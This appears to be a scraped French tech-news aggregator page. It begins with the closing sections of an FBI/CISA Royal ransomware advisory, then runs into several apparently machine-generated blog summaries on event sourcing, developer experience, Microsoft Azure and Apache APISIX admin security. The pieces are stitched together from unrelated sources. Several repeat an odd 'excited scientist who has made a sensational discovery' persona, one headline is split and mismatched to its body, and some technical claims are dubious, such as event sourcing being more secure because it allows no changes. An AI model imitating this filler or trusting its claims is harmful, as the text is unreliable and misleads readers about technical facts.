FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA’s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, tactics, techniques, and procedures, and which yield goals that all organizations across critical infrastructure sectors should implement:
RESOURCES
REPORTING
FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Royal actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details requested include: a targeted company Point of Contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, host and network based indicators.
FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at https://www.cisa.gov/report.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.
REFERENCES
[1] Royal Rumble: Analysis of Royal Ransomware (cybereason.com)
[2] DEV-0569 finds new ways to deliver Royal ransomware, various payloads – Microsoft Security Blog
[3] 2023-01: ACSC Ransomware Profile – Royal | Cyber.gov.au
ACKNOWLEDGEMENTS
Recorded Future, Coveware, Digital Asset Redemption, Q6, and RedSense contributed to this CSA.
Please share your thoughts. We recently updated our anonymous Product Feedback Survey and we’d welcome your feedback.
Source de l’article sur us-cert.gov
Event Sourcing vs Database: What’s Next?
Actualités, Méthodes et organisation des process ITEvent sourcing and databases have been the go-to solutions for data storage, but what’s the next step? Let’s explore the pros and cons of each and see what the future holds.
## Understanding Event Sourcing and Its Popularity
I am an excited scientist who has made a sensational discovery about event sourcing and its potential to outgrow databases. Event sourcing is a powerful tool that is being adopted by many large organizations as their database architectural design. It has the capability to scale up and serve the needs of the modern data industry.
Event sourcing is a process of storing data in an event log, which is an append-only store. This means that all changes to the data are recorded as a sequence of events. This makes it easier to track changes over time and allows for easy replication of data. Event sourcing also allows for easy scalability, as the data can be replicated across multiple servers.
The popularity of event sourcing is growing rapidly, as it offers many advantages over traditional databases. Event sourcing allows for faster data retrieval, as it stores data in an append-only store. This makes it easier to query and analyze data over time. It also allows for better scalability, as the data can be replicated across multiple servers. Additionally, event sourcing is more secure than traditional databases, as it is append-only and does not allow for any changes to be made to the data.
So, is event sourcing going to outgrow databases? It is hard to say for sure, but the advantages offered by event sourcing make it a strong contender for replacing traditional databases. Event sourcing allows for faster data retrieval, better scalability, and improved security. As more organizations begin to adopt event sourcing, it is likely that it will become the preferred choice for many applications.
Source de l’article sur DZONE
Expérience développeur: les métriques les plus importantes
ActualitésDécouvrez quelles sont les métriques les plus importantes pour un développeur afin d’améliorer son expérience.
## Developer Experience (DevEx or DX)
Le développeur expérience. Si vous fournissez des API ou des produits axés sur les API, vous entendez probablement souvent ce terme. Après tout, vous avez besoin de développeurs pour qu’une API réussisse – et s’ils n’ont pas une excellente expérience, ils passeront à autre chose.
Qu’est-ce que l’expérience du développeur?
L’expérience du développeur (DevEx ou DX) est une extension de l’expérience utilisateur (UX) où l’accent est mis sur les utilisateurs touchés par le côté technique des choses – par exemple, les outils, les langages et les flux de travail. Mais DevEx va bien au-delà de «UX pour les développeurs»: cela signifie s’assurer que les développeurs peuvent facilement comprendre et exploiter une API pour leurs propres applications et cas d’utilisation. Une excellente DevEx se produit lorsque vous communiquez avec vos utilisateurs développeurs, en comprenant et en répondant directement à leurs besoins. Si vous pouvez gagner les développeurs, vous pouvez construire un grand et prospère écosystème autour de vos produits.
Le code est le cœur de l’expérience du développeur. C’est la partie la plus importante de DevEx, car c’est ce qui permet aux développeurs de créer des applications qui exploitent votre API. Les bons outils de codage sont essentiels pour donner aux développeurs une expérience cohérente et agréable. Les outils doivent être faciles à apprendre et à utiliser, et doivent offrir des fonctionnalités intuitives. Les bons outils de codage peuvent aider les développeurs à créer rapidement des applications robustes et fiables qui tirent parti de votre API.
Enfin, une bonne expérience du développeur nécessite une documentation complète et précise. La documentation doit être claire et concise, et doit fournir aux développeurs toutes les informations dont ils ont besoin pour comprendre et utiliser votre API. La documentation doit également inclure des exemples clairs et des tutoriels pour aider les développeurs à comprendre comment votre API fonctionne et à créer rapidement des applications qui en tirent parti. Une bonne documentation peut faire toute la différence entre un développeur qui comprend votre API et un développeur qui abandonne.
En résumé, l’expérience du développeur est essentielle pour le succès d’une API. Pour offrir une expérience exceptionnelle aux développeurs, vous devez mettre l’accent sur le codage, fournir des outils intuitifs et faciles à utiliser, et fournir une documentation complète et précise. Si vous pouvez offrir une expérience exceptionnelle aux développeurs, vous pouvez construire un grand écosystème autour de votre produit et réussir à long terme. En tant que scientifique enthousiaste qui vient de faire une sensationnelle découverte, je suis convaincu que l’expérience du développeur est la clé du succès d’une API.
Source de l’article sur DZONE
Microsoft Azure is a cloud computing platform and infrastructure
ActualitésMicrosoft Azure is a cloud computing platform and infrastructure created by Microsoft for building, deploying, and managing applications and services through a global network of Microsoft-managed data centers. It provides a range of cloud services, including compute, storage, analytics, networking, and identity management. Azure is designed to help organizations of all sizes quickly and cost-effectively develop, deploy, and manage applications and services in the cloud.
Azure offers a wide range of services that can be used to build, deploy, and manage applications and services in the cloud. These include compute, storage, analytics, networking, and identity management. Compute services provide access to virtual machines, containers, and serverless computing resources. Storage services provide access to object storage, file storage, and databases. Analytics services provide access to data analysis tools such as machine learning, data warehousing, and big data processing. Networking services provide access to virtual networks, DNS, load balancing, and traffic management. Identity management services provide access to authentication and authorization services.
Azure also provides a range of tools and services that can be used to manage applications and services in the cloud. These include Azure Resource Manager (ARM), which provides a unified way to deploy, manage, and monitor resources in the cloud; Azure Automation, which provides a way to automate tasks; and Azure Monitor, which provides a way to monitor the performance of applications and services in the cloud. Additionally, Azure provides a range of security features such as encryption, identity management, and access control. These features help ensure that applications and services are secure and compliant with industry standards.
In conclusion, Microsoft Azure is a powerful cloud computing platform and infrastructure that provides a wide range of services for building, deploying, and managing applications and services in the cloud. It offers a range of compute, storage, analytics, networking, and identity management services that can be used to quickly and cost-effectively develop, deploy, and manage applications and services in the cloud. Additionally, it provides a range of tools and services for managing applications and services in the cloud as well as a range of security features for ensuring that applications and services are secure and compliant with industry standards.
Intro to Context
Actualités, Méthodes et organisation des process ITual Advertising
Contextual advertising is a powerful tool for businesses to reach their target audience with relevant, targeted ads. Learn how it works and its potential to drive sales!
## The Full Context: A Software Project’s Aura
I am an excited scientist who has made a sensational discovery: coding is the key to unlocking The Full Context. By coding, I mean writing code that is both readable and maintainable. It’s not just about writing code that works; it’s about writing code that is easy to understand and modify.
Coding is the foundation of The Full Context. It is the language that allows us to communicate our ideas, our intentions, and our decisions to the software. It is the bridge between the project’s stakeholders and the software itself. Without coding, there would be no way to effectively communicate the project’s requirements to the software.
Coding is also the key to unlocking the potential of The Full Context. By writing code that is both readable and maintainable, we can ensure that the project’s requirements are accurately represented in the software. We can also ensure that future changes and modifications can be made quickly and easily. This allows us to keep up with the ever-changing requirements of the project, while still maintaining a high level of quality.
The Full Context is a powerful tool that can be used to create amazing software projects. But without coding, it would remain just a concept, never fully realized. By coding, we can unlock its potential and create projects that are both powerful and maintainable. This is why coding is so important; it is the key to unlocking The Full Context and creating amazing software projects.
Source de l’article sur DZONE
MICROSOFT AZURE : Cloud platform
ActualitésMicrosoft Azure is a cloud computing platform and infrastructure created by Microsoft for building, deploying, and managing applications and services through a global network of Microsoft-managed data centers. It provides software as a service (SaaS), platform as a service (PaaS) and infrastructure as a service (IaaS) and supports many different programming languages, tools, and frameworks, including both Microsoft-specific and third-party software and systems.
Azure provides a comprehensive set of cloud services that enable organizations to build, deploy, and manage applications across a global network of Microsoft-managed data centers. It offers a wide range of services, including virtual machines, storage, databases, networking, analytics, and more. It also provides tools for developing and managing applications, such as Visual Studio, Azure DevOps, and Azure Machine Learning.
Azure enables organizations to quickly and easily deploy applications and services to the cloud. It provides a secure, reliable, and cost-effective platform for running applications in the cloud. It also provides a range of services for managing and monitoring applications and services, including Azure Monitor, Azure Security Center, and Azure Automation. Additionally, it offers advanced analytics capabilities with Azure Machine Learning and Azure Cognitive Services.
In addition to providing cloud services, Azure also offers a range of tools for developing and managing applications. It provides a range of development tools such as Visual Studio Code, Visual Studio Team Services, and Azure DevOps. It also provides a range of services for managing applications such as Azure Resource Manager, Azure Automation, and Azure Monitor. Additionally, it provides a range of services for monitoring applications such as Azure Application Insights and Azure Security Center.
Azure also provides a range of services for storing data in the cloud. It offers a range of storage services such as Azure Blob Storage, Azure Files, Azure Queue Storage, and Azure Table Storage. It also provides a range of database services such as Azure SQL Database and Azure Cosmos DB. Additionally, it provides a range of services for managing data such as Azure Data Factory and Azure Data Lake.
Overall, Microsoft Azure is an incredibly powerful cloud computing platform that enables organizations to quickly and easily deploy applications and services to the cloud. It provides a secure, reliable, and cost-effective platform for running applications in the cloud. It also provides a range of tools for developing and managing applications as well as services for storing data in the cloud. With its comprehensive set of cloud services and tools, Microsoft Azure is an essential platform for any organization looking to take advantage of the power of the cloud.
Secure Admin Access to Apache APISIX
Actualités, Méthodes et organisation des process ITSecure your APIs with Apache APISIX – the open source, high-performance API gateway that provides secure admin access.
Securing Your Apache APISIX Admin Access
I am an excited scientist who has made a sensational discovery: data security can be improved by protecting your Apache APISIX admin access. This is a critical component of your infrastructure, as it is responsible for routing traffic to the right places. If an attacker were to gain access to this, they could potentially redirect traffic to their own infrastructure, leading to data theft or financial losses.
To ensure the security of your data, it is essential to protect your Apache APISIX admin access. Here are a few ways to do this:
First, you should enable authentication for the admin API. This will require users to enter a username and password before they can access the API. You can also use two-factor authentication for additional security. Additionally, you should limit the IP addresses that are allowed to access the admin API. This will ensure that only trusted IP addresses can access the API and prevent unauthorized access.
Second, you should use TLS encryption for all communication with the admin API. This will ensure that all data is encrypted in transit and protect it from interception. Additionally, you should use a strong cipher suite to ensure that the data is encrypted with a strong algorithm.
Finally, you should monitor all activity on the admin API. This will allow you to detect any suspicious activity and take action quickly. You should also use logging to track all requests and responses to the admin API. This will allow you to review any suspicious activity and take action if necessary.
In conclusion, protecting your Apache APISIX admin access is essential for ensuring the security of your data. By following the steps outlined above, you can ensure that your data is safe and secure. With these measures in place, you can rest assured that your data is protected from unauthorized access and theft.
Source de l’article sur DZONE